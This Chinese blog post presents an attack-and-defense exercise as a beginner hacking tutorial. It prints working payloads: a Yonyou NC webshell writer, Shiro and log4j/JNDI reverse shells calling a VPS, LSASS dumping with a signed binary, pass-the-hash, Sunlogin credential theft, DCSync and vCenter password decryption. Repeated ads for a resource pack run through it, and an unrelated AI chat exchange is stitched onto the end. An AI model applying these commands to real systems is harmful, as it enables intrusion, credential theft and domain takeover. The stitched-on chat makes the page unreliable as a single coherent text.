网络安全渗透实战!记一次攻防演练渗透测试实战,黑客技术零基础入门到实战教程!

1、外网打点

资产发现

多测绘平台搜索

https://hunter.qianxin.com/
https://fofa.info/
https://quake.360.cn/

多语法搜索

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

假如某个目标站点为xxxx.com ,我们可以通过不同的语法进行资产搜集,搜集的资产会更全面
这里以fofa为例

domain="xxxx.com"    
host="xxxx.com"    
header="xxxx.com"    
cert="xxxx.com"  

敏感信息泄露

对于学校站点的信息搜集,一般来说外网能拿直接权限的点已经很少了,web应用大多是放在vpn后面,因此能弄到一个vpn账号可以说是事半功倍,这时候可以通过语法对此类信息进行挖掘

常用命令如下:

#google语法    
site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码    
    
#github    
*.edu.cn password  

在这次攻防演练里,也是幸运找到了某站点VPN的默认口令,使用的是 姓名拼音/12345678 弱口令

默认口令

对于部分站点,在搭建完成后可能没有更改默认账号密码,这时候可以尝试使用默认账密登录

下面列举一些常见的web站点默认口令

账号:  
admin administrator root user test    
    
密码:  
admin admin123 123456 123 test root  

对于一些应用广泛的系统,可以通过google语法搜索其默认密码

这里通过sysadmin/1 成功登入泛微后台

nacos/nacos

常见漏洞利用

对于多目标的攻防演练,个人比惯把目标子域url搜集好,去重后批量导进去指纹识别工具,如Goby、fofahub

从指纹识别结果里筛选出重要资产进行突破,使用已知漏洞或day进行攻击

以下为一些批量漏洞利用工具:

https://github.com/Anonymous-ghost/AttackWebFrameworkTools-5.0
https://github.com/d3ckx1/Fvuln
https://github.com/W01fh4cker/Serein

框架类的如log4j、shiro、struts2等

OA类的如致远、泛微、用友、蓝凌等,这里也是找到了目标的用友nc站点

用友nc写shell

访问接口/servlet/~ic/bsh.servlet.BshServlet执行命令

dnslog探测了一下发现不出网,这里直接写入webshell

1、首先生成一个哥斯拉的jsp木马,然后进行unicode编码

2、再把输出结果进行url编码

3、payload字段如下,这里写入默认路径为 webapps/nc_web ,实战中灵活应变

String keyWord = URLDecoder.decode("xxxxxx(填入生成内容)xxxxxx", "utf-8");      
BufferedWriter out = new BufferedWriter(new FileWriter("/webapps/nc\_web/test.jsp"));    
out.write(keyWord);    
out.close();  

这里直接写入哥斯拉马,连接成功

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

shiro无依赖链利用

通过测绘平台找到一个比较偏的资产,直接访问是一个静态页面,但扫描目录后指纹识别一波发现是shiro

直接使用shiro_attack_2.2工具开冲,发现有默认key但是无利用链

可能有些人看到这里就放弃了,但这可能会错过一个利用点

shiro可以无依赖链利用,感觉有戏尝试一波,相关知识可拜读师傅的文章https://www.le1a.com/posts/a5f4a9e3

这里换用其他工具

通过dnslog测试有回显,这里有个注意点:使用 http://dnslog.cn/ 部分站点会拦截,可以换多个dnslog平台测试

dnslog有回显接下来就是拿shell了,这里由于固定思维,之前遇到的都是linux系统,先入为主觉得是Linux,结果没利用成功,一开始以为是防火墙拦截,后面探测了一下目录结构,发现是windows,所以这里payload要改变一下

这里可以通过网站快速生成payload
https://x.hacking8.com/java-runtime.html

Linux:  
java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils1 "bash -c {echo,字段}|{base64,-d}|{bash,-i}"    
字段=bash -i >& /dev/tcp/x.x.x.x/8888 0>&1 base64后的值    
nc -lvp 端口  
  
Windows:  
java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS地址    
java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p"    
d2hvYW1p为命令的base64,这里是执行命令whoami  

2、内网渗透

杀软识别

拿到一台机器后,一般先看一下安装了什么安全防护产品

tasklist /svc

探测了一下发现安装了360,把之前准备好的bypass360马子扔上去,成功上线

隧道搭建

ping了一下发现机器出网,可以上frp搭建反向代理隧道

proxifier配置相应的端口账密便可以进入内网

横向思路

1、优先拿运维机器,一般存放着大量的账号密码信息

2、其次是集权设备,Vcenter、堡垒机、天擎这些,有day上day,没day寻找其他方法

3、有域的情况下,争取拿到域管hash,或者通过已知漏洞拿下域控

横向移动

在扫描之前,可以先通过netspy筛选可达的网段再进行扫描

https://github.com/shmilylty/netspy

接着上fscan对可达各个C段开扫,追求效率可只扫描22、80、443、445、1433、8080等重点端口

由于扫描会引起安全设备告警,因此横向尽可能在一小时内结束,避免入口机器被关机下线,对于拿到的机器可以通过计划任务进行维权,尽可能多拿几台机器保证口子不会掉,拿到机器后继续做信息搜集,网段,机器信息,敏感文件,xshell、navicat密码等常规的这里就不细说了

dump lssas

正常没有杀软我们可以通过mimikatz抓取密码

但很多时候mimikatz会被拦截,这时候可以通过一些LOLBINS方法dump出来本地解

这里使用的dump64.exe为白程序,位置位于

C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\

dump64.exe pid c:\\users\\xxx\\Desktop\\out.dmp

测试可过360和火绒

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

密码复用

08机器之前可以抓到明文,抓不到明文可以尝试到cmd5上进行破解,破解率较高

https://www.cmd5.com
https://www.somd5.com

获取密码之后可以通过超级弱口令工具进行密码复用爆破,拿着获取的密码重新组合字典,对网段内的机器进行爆破,这次也是成功拿下了几十台机器

若hash解不出来,这时候我们可以根据开放的端口进行PTH,下面列举一些

wmiexec  135端口    
psexec   445端口    
evil-winrm   5985端口  

向日葵读取密码

拿到机器的账号密码之后,若机器开启了3389端口可以选择rdp远程桌面过去,没开的话可以开启3389端口进行远程连接

#执行以下命令操作注册表来开启机器3389远程桌面服务    
REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG\_DWORD /d 00000000 /f    
  
#使用以下命令添加防火墙放行策略    
netsh firewall add portopening protocol = TCP port = 3389 name = rdp  

但如果是正常办公时间,贸然登录过去会很容易引起对方的发现,若进程中有sunlogin进程,可以读取识别码和验证码,通过向日葵连接相对比较隐蔽

注册表读取配置信息:

reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo    
reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo    
  
向日葵默认配置文件路径:    
安装版:C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini    
便携版:C:\\ProgramData\\Oray\\SunloginClient\\config.ini    
本机验证码参数:encry\_pwd    
本机识别码参数:fastcode(去掉开头字母)    
sunlogincode:判断用户是否登录状态  

读注册表:

读默认配置文件:

fastcode去掉前面的数字k为本机识别码278263893

使用脚本进行解密获得本机验证码

运维机

横向的时候优先拿运维机,一般运维机存储着大量的账号密码信息,比如这次无意中发现的运维机器使用的是弱口令administrator/111111

另外还可以通过cs插件查看机器历史登录IP对运维人员进行锁定

拿下后可通过命令行快速收集服务器、网络拓扑、密码本、公司信息等重要文件。

dir /a /s /b d:\\" \*.txt"     
dir /a /s /b d:\\"\* pass \*"     
dir /a /s /b d:\\"\* login \*"     
dir /a /s /b d:\\"\* user \*"    
dir /a /s /b c:\\password.txt    
dir /a /s /b c:\\\*.conf \*.ini\* .inc\* .config     
dir /a /s /b c:\\conf.\* config.\*     
dir /a /s /b c:\\\*.txt \*.xls\* .xlsx\* .docx | findstr "拓扑"    
dir /a /s /b c:\\\*.conf \*.ini\* .inc\* .config | findstr "运维"    
dir /a /s /b c:\\\*.txt \*.xls\* .xlsx\* .docx | findstr "密码" >C:\\Users\\1.txt  

最后收集了一堆密码本,可登录到各重要系统:

H3C堡垒机

禅道

域控

1、通过fscan扫描的时候可以检索AD关键字发现域控

[*]192.168.10.38 #非真实域控ip    
   [->]D1-Prod-AD-P01    
   [->]192.168.10.38    
       
[*]192.168.10.20 #非真实域控ip    
   [->]AD    
   [->]192.168.10.20  

2、域内主机 DNS 一般就是域控地址

接着可以通过该机器是否开放53和389端口进行进一步确认

这次攻防演练的其中一个目标,通过密码复用爆破成功的某台机器里,刚好存在着域管进程,提权到system权限后注入到域管进程,通过Dcsync成功获取域管密码的hash值,其中一个被禁用的账户刚好可以通过cmd5解出,解出明文密码并激活账户,成功登录两台域控机器,除此以外还可以尝试域漏洞、NTLM中继等

net group "domain admins" /domain    
dcsync domain xxxx    
shell net user xxxx    
shell net user xxxx /active:yes /domain  

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

Vcenter

在扫描的过程中发现几台Vcenter,Vcenter常规有三种打法,分别是

CVE-2021-22005-rce、CVE-2021-21972-rce和log4j

前两个测试没成功,log4j通过dnslog探测漏洞存在,vcenter的漏洞触发点在xff头部

java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1389 -p 8889 -i 0.0.0.0    
nc -lvp 9000    
${jndi:ldap://VPSIP:1389/Deserialization/CommonsBeanutils1/ReverseShell/VPSIP/9000}  

但一般打完是非交互式shell,没有回显,这里使用命令切换为交互式shell

python -c 'import pty;pty.spawn('/bin/bash')'

重置密码

/usr/lib/vmware-vmdir/bin/vdcadmintool

不重置密码获取密码

https://github.com/shmilylty/vhost_password_decrypt

#获取vc用户的密码    
cat /etc/vmware-vpx/vcdb.properties    
    
#把加密后的密码单独拿出来,    
psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip\_address,user\_name,password from vpx\_host;" > password.enc    
#改成这种格式\*    
H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==\*    
zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==\*    
Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==\*    
R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA==    
    
#拿解密key    
cat /etc/vmware-vpx/ssl/symkey.dat    
Windows:C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\ssl\\symkey.dat    
Linux:/etc/vmware-vpx/ssl/symkey.dat    
    
#破解    
python decrypt.py symkey.dat password.enc pass.txt  

然后就可以登入web控制台了


云管平台

通过运维机的xshell查找历史记录拿下了主备数据库,然后执行sql语句成功获取出了云管平台的hash

到cmd5上进行解密,一块钱拿下云管平台很划算

但某些系统加密方式不是使用md5的,比如之前碰到的一些系统使用的是Bcrypt加密方式,像这种不可逆的加密方式可以通过替换hash进行登录

$2a$10$z0hHT9rltH59VvcazrSzOuVDNr05shwja1aZmD8ctzDbuNNvdpNIS

官网

当我们拿到集权设备后,一般里面会有靶标系统或核心系统,这些分数是很高的,这次演练某目标就是通过云管平台登录官网机器,抓取浏览器密码成功获取后台密码,成功拿下官网控制权

gitlab仓库

根据评分规则刷完路径分之后,可以根据目标性质找一些核心关键的系统跟裁判battle,像这种存有大量代码的仓库可以作为重大成果进行提交

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

<think>嗯,用户想找关于渗透测试的学习资源,包括教程、资料、入门指南这些。首先,我需要回顾一下用户提供的引用内容,里面有提到书籍、视频教程和一些学习建议。用户可能是个刚入门的新手,所以需要从基础开始指导。 首先,用户提到的引用里有几本书,比如《Web安全深度剖析》、《白帽子讲Web安全》,这些应该推荐。还有提到Python的学习,用户可能对编程方面有需求,所以需要强调Python在渗透测试中的重要性,并推荐相关书籍和视频教程。 然后,用户可能不太喜欢纯理论,所以需要结合实践资源,比如实验环境搭建、靶场平台,这样他们可以动手练习。引用里提到的DVWA、Vulnhub这些平台应该包含进去。 接下来,用户可能关心学习路径,需要分阶段指导,比如基础知识、工具使用、实战演练、编程提升和持续学习。这样结构清晰,用户容易跟随。 还要注意用户提到的视频教程在B站上有,虽然用户没具体推荐,但可以建议他们自行查找评价高的课程。另外,引用里提到有282G的学习资料包,这可能是个吸引点,但需要提醒用户注意来源的可信度,避免遇到不可靠的内容。 另外,用户可能担心自己是否适合学习渗透测试,所以需要鼓励他们,强调实践和持续学习的重要性。同时,提醒学习中的法律和道德问题,避免他们误入歧途。 最后,生成相关问题时要覆盖用户可能进一步的需求,比如如何选择编程语言、搭建环境、法律问题等,这样能帮助他们更全面地了解学习路径和注意事项。</think>### 渗透测试学习资源指南 #### 一、书籍推荐(理论+实践结合) 1. **入门基础** - 《Web安全深度剖析》:从基础漏洞(如SQL注入、XSS)到实战案例解析,适合零基础学习[^1][^4] - 《黑客攻防技术宝典:Web实战篇》:覆盖OWASP Top 10漏洞原理及防御方法[^1] - 《白帽子讲Web安全》:阿里安全专家编写,包含企业级安全实践 2. **进阶提升** - 《Python安全攻防渗透测试实战指南》:结合Python实现自动化渗透工具(如端口扫描、漏洞利用)[^5] - 《网络攻防实战研究:漏洞利用与提权》:深入系统层漏洞分析与提权技术 #### 二、视频教程与课程 1. **Bilibili平台** - 搜索关键词:`渗透测试实战`、`Kali Linux教程`、`CTF入门` - 建议选择播放量>10万、评论活跃的系列课程(如“渗透测试从0到1”类教程) 2. **体系化学习路径** ```text 基础知识(2个月) → 工具实践(1个月) → 靶场攻防(3个月) ├─网络协议 ├─Nmap/Metasploit ├─DVWA漏洞平台 ├─Linux基础 ├─Burp Suite ├─Hack The Box └─Web安全原理 └─SQLMap/Wireshark └─Vulnhub实战 ``` #### 三、实验环境搭建 1. **必装工具** - Kali Linux:集成600+渗透测试工具(如Aircrack-ng、John the Ripper) - VMware/VirtualBox:用于搭建漏洞靶机环境 - 推荐靶场:DVWA(低难度)、OWASP Juice Shop(综合场景)[^2] #### 四、免费学习资源包 - 网络安全入门资源包(约282G):包含漏洞分析文档、工具包、CTF题目合集等 (注意:需通过可信渠道获取,警惕伪装成教程的恶意软件) #### 五、编程能力培养 - **Python学习路径**: 1. 基础语法 → 2. Requests网络库 → 3. Scapy数据包处理 → 4. 编写POC/EXP脚本 推荐书籍:《Python黑帽子:黑客与渗透测试编程之道》[^5]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值